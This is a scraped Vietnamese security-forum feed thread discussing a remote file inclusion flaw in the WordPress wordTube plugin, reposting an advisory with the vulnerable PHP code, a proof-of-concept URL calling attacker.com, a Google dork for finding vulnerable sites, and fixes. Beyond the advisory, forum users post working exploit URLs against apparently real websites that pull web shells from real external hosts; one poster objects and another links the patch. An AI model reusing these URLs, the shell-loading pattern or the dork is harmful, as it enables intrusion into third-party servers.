<![CDATA[Latest posts for the topic "wordpress plugins - Remote File Inclusion (High)"]]> /hvaonline/posts/list/13.html JForum - http://www.jforum.net wordpress plugins - Remote File Inclusion (High) http://securityreason.com/securityalert/2660 Vulnerability: ~~~~~~~~~~~~~ - Invalid include function at wordtube-button.php : ----------------wordtube-button.php------------------- ... */ // get and set path of function if (!$_POST) $wppath=$_GET['wpPATH']; else $wppath=$_POST['wpPATH']; require_once($wppath.'/wp-config.php'); require_once($wppath.'/wp-admin/admin.php'); ... ---------------------------------------------------------------- Input passed to the "wpPATH" parameter in wordtube-button.php is not properly verified before being used to include files. This can be exploited to include arbitrary files from local or external resources. Successful exploitation requires that "register_globals" is enabled. Poc/Exploit: ~~~~~~~~~ http://www.target.com/wp-content/plugins/wordtube/wordtube-button .php?wpPATH=http://attacker.com/evil? Google dork: ~~~~~~~~~ inurl:/plugins/wordtube Solution: ~~~~~~ - Edit the source code to ensure that input is properly verified. - Turn off register_globals - use the latest version =================== cái này lâu rồi nhưng search lại vẫn dính đầy. http://xxx.com/home/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://sgstars.tripod.com/shell.txt? @Đã sửa link ...sorry.]]> /hvaonline/posts/list/12655.html#74143 /hvaonline/posts/list/12655.html#74143 GMT wordpress plugins - Remote File Inclusion (High) /hvaonline/posts/list/12655.html#74499 /hvaonline/posts/list/12655.html#74499 GMT wordpress plugins - Remote File Inclusion (High) /hvaonline/posts/list/12655.html#74528 /hvaonline/posts/list/12655.html#74528 GMT wordpress plugins - Remote File Inclusion (High) /hvaonline/posts/list/12655.html#74531 /hvaonline/posts/list/12655.html#74531 GMT wordpress plugins - Remote File Inclusion (High) Lưu ý để tránh nhưng người phá phách nhưng chưa thực sự ý thức và hiểu rõ vấn đề làm ơn lần sau đừng nên đưa shell lên như thế.  thì để cho bạn đó nghịch được ko đã chứ bro ^^.]]> /hvaonline/posts/list/12655.html#74536 /hvaonline/posts/list/12655.html#74536 GMT wordpress plugins - Remote File Inclusion (High)

minhquan1712 wrote:
http://oakviewhomes.com/home/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://it-more.net/coolkid.txt? :P) :|-)) . Xài source code free là vậy đó, bị hack lúc nèo ko hay ^^ 
HVA cũng đang xài "source code free" đó :)) Remote File Inclusion chỉ xảy ra cho wordpress có dùng wordtube plugin bản cũ, chưa được fix lỗi. Wordtube có bản vá lỗi, và có thể tìm thấy tại: http://wordpress.org/extend/plugins/wordtube/ http://alexrabe.boelinger.com/?page_id=20]]>
/hvaonline/posts/list/12655.html#74537 /hvaonline/posts/list/12655.html#74537 GMT
wordpress plugins - Remote File Inclusion (High) HVA cũng đang xài "source code free" đó   nhưng chẳng phải là bro conmale đã nói là jForum của HVA khác khá nhiều với bản gốc sao?Tức là đã wa nhiều bước thay đổi mã nguồn để nâng tính bảo mật lên rồi ^^. ]]> /hvaonline/posts/list/12655.html#74731 /hvaonline/posts/list/12655.html#74731 GMT wordpress plugins - Remote File Inclusion (High) /hvaonline/posts/list/12655.html#76855 /hvaonline/posts/list/12655.html#76855 GMT